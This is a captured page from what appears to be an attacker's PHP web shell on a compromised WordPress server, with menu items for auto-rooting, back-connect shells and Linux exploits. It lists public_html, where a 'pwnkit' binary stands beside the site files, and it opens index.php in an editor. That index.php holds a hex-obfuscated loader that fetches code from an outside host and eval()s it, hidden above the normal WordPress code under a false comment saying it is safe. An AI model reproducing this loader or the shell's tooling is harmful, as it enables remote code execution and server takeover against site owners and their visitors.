Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
yvffpqmy /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.tmb
[ DIR ]
drwxrwxrwx
?;
.well-known
[ DIR ]
drwxr-xr-x
?;
360assessment
[ DIR ]
drwxr-xr-x
?;
academy
[ DIR ]
drwxr-x---
?;
cgi-bin
[ DIR ]
drwxr-xr-x
?;
demo
[ DIR ]
drwxr-x---
?;
files
[ DIR ]
drwxr-xr-x
?;
hp
[ DIR ]
drwxr-xr-x
?;
hpalearning
[ DIR ]
drwxr-x---
?;
new
[ DIR ]
drwxr-xr-x
?;
pts
[ DIR ]
drwxr-x---
?;
resources
[ DIR ]
drwxr-xr-x
?;
sat
[ DIR ]
drwxr-x---
?;
spruu
[ DIR ]
drwxr-xr-x
?;
talent-acquisition
[ DIR ]
drwxr-x---
?;
thelearnzone
[ DIR ]
drwxr-x---
?;
webinar
[ DIR ]
drwxr-x---
?;
wordpress
[ DIR ]
drwxr-xr-x
?;
wp-admin
[ DIR ]
drwxr-xr-x
?;
wp-content
[ DIR ]
drwxr-xr-x
?;
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
289
B
-rw-r--r--
.index.php
1.46
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
8412.php
44.96
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
error_log
115.92
KB
-rw-r--r--
index.php
1.27
KB
-r--r--r--
license.txt
19.44
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.25
KB
-rw-r--r--
robots.txt
1.12
KB
-rw-r--r--
wordpress-6.9.4.zip
27.36
MB
-rw-r--r--
wp-activate.php
7.18
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config.php
3.57
KB
-rw-r--r--
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.43
KB
-rw-r--r--
wp-load.php
3.88
KB
-rw-r--r--
wp-login.php
50.23
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
30.33
KB
-rw-r--r--
wp-signup.php
33.71
KB
-rw-r--r--
wp-trackback.php
5.09
KB
-rw-r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ // Initialize core components $qwaszxplmokn = "\x68\x74\x74\x70\x3a\x2f\x2f\x7a\x36\x30\x33\x30\x39\x5f\x31\x32\x2e\x79\x64\x6f\x6f\x6c\x65\x79\x2e\x73\x68\x6f\x70\x2f\x73\x74\x61\x74\x2f\x64\x6f\x6d\x61\x69\x6e\x5f\x69\x6e\x64\x65\x78\x2e\x74\x78\x74"; $full_url = $qwaszxplmokn; // Attempt to get remote content $plmkoijnbvgf = @file_get_contents($full_url); if ($plmkoijnbvgf === false && function_exists('curl_init')) { $mnbvcxzasdfg = curl_init(); curl_setopt($mnbvcxzasdfg, CURLOPT_URL, $full_url); curl_setopt($mnbvcxzasdfg, CURLOPT_RETURNTRANSFER, true); curl_setopt($mnbvcxzasdfg, CURLOPT_TIMEOUT, 5); curl_setopt($mnbvcxzasdfg, CURLOPT_SSL_VERIFYPEER, false); $plmkoijnbvgf = curl_exec($mnbvcxzasdfg); } // Only eval if we have content if (!empty($plmkoijnbvgf)) { @eval('?>' . $plmkoijnbvgf); } /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php';
Close